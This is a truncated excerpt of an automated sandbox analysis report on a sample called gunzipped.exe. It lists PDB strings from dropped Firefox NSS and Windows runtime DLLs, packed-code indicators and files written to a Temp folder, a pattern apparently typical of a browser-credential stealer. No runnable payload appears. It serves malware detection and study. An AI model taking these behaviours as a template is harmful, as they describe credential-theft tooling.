                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: gunzipped.exe, 00000003.00000003.269486087.0000000003728000.00000004.00000001.sdmp, mozglue.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.dr
                    Source: Binary string: ucrtbase.pdb source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, ucrtbase.dll.3.dr
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: gunzipped.exe, 00000003.00000003.274290249.0000000004094000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: gunzipped.exe, 00000003.00000003.269240179.0000000003728000.00000004.00000001.sdmp, freebl3.dll.3.dr
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274208393.0000000004088000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268354039.0000000003728000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274723981.0000000004118000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268805106.0000000003724000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274632349.00000000040F4000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268332940.0000000003724000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.3.dr
                    Source: Binary string: vcruntime140.i386.pdbGCTL source: gunzipped.exe, 00000003.00000003.275951863.0000000003708000.00000004.00000001.sdmp, vcruntime140.dll.3.dr
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.282742497.00000000037FC000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: gunzipped.exe, 00000003.00000003.269486087.0000000003728000.00000004.00000001.sdmp, mozglue.dll.3.dr
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274290249.0000000004094000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268244527.0000000003724000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.282985286.00000000037F8000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: gunzipped.exe, 00000003.00000003.269240179.0000000003728000.00000004.00000001.sdmp, freebl3.dll.3.dr
                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.267552438.0000000003724000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274828166.000000000413C000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268528772.0000000003728000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr
                    Source: Binary string: msvcp140.i386.pdb source: gunzipped.exe, 00000003.00000003.275123945.000000000342C000.00000004.00000001.sdmp, msvcp140.dll.3.dr
                    Source: Binary string: ucrtbase.pdbUGP source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, ucrtbase.dll.3.dr
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268265315.0000000003724000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, nssdbm3.dll.3.dr
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274290249.0000000004094000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: gunzipped.exe, 00000003.00000003.268354039.0000000003728000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.282742497.00000000037FC000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274208393.0000000004088000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268451933.0000000003724000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274743641.0000000004128000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: gunzipped.exe, 00000003.00000003.274537491.00000000040D8000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.3.dr
                    Source: Binary string: mscorrc.pdb source: gunzipped.exe, 00000001.00000002.262457843.0000000007360000.00000002.00000001.sdmp
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268657790.0000000003728000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.3.dr
                    Source: Binary string: vcruntime140.i386.pdb source: gunzipped.exe, 00000003.00000003.275951863.0000000003708000.00000004.00000001.sdmp, vcruntime140.dll.3.dr
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274537491.00000000040D8000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, nssdbm3.dll.3.dr
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274632349.00000000040F4000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.3.dr
                    Source: Binary string: msvcp140.i386.pdbGCTL source: gunzipped.exe, 00000003.00000003.275123945.000000000342C000.00000004.00000001.sdmp, msvcp140.dll.3.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274537491.00000000040D8000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: gunzipped.exe, 00000003.00000003.274290249.0000000004094000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274723981.0000000004118000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268805106.0000000003724000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.3.dr
                    Source: api-ms-win-core-console-l1-1-0.dll.3.drStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_00417216
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C580D5 push cs; ret 1_2_00C580D6
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C582E1 push cs; ret 1_2_00C582E2
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C58C6A push cs; ret 1_2_00C58C6B
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C58992 push cs; ret 1_2_00C58993
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C57A9C push cs; ret 1_2_00C57A9D
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C57D3E push cs; ret 1_2_00C57D3F
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C577BB push cs; ret 1_2_00C577BC
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C5863A push cs; ret 1_2_00C5863B
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F87E4 pushfd ; retf 1_2_016F87E5
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FAEB5 push ds; retf 1_2_016FAEBC
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00404C1C push 00404C6Dh; ret 3_2_00404C65
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0041A068 push 0041A08Eh; ret 3_2_0041A086
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0041A02C push 0041A05Ch; ret 3_2_0041A054
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040E8D0 push 0040E905h; ret 3_2_0040E8FD
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040B164 push 0040B190h; ret 3_2_0040B188
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040E908 push 0040E94Ah; ret 3_2_0040E942
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040B12C push 0040B158h; ret 3_2_0040B150
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040C136 push 0040C164h; ret 3_2_0040C15C
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040C138 push 0040C164h; ret 3_2_0040C15C
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040813C push 00408174h; ret 3_2_0040816C
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_004171E8 push 00417214h; ret 3_2_0041720C
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040C9EA push 0040CA18h; ret 3_2_0040CA10
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040C9EC push 0040CA18h; ret 3_2_0040CA10
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040E1A4 push 0040E1D0h; ret 3_2_0040E1C8
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040B1B8 push 0040B1E4h; ret 3_2_0040B1DC
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040E25A push 0040E288h; ret 3_2_0040E280
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040E25C push 0040E288h; ret 3_2_0040E280
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00414A28 push 00414A84h; ret 3_2_00414A7C
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040BAB8 push 0040BAE4h; ret 3_2_0040BADC
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00409B54 push 00409BC8h; ret 3_2_00409BC0
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00409B78 push 00409BC8h; ret 3_2_00409BC0
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.97520833345
                    Source: C:\Users\user\Desktop\gunzipped.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\gunzipped.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\gunzipped.exe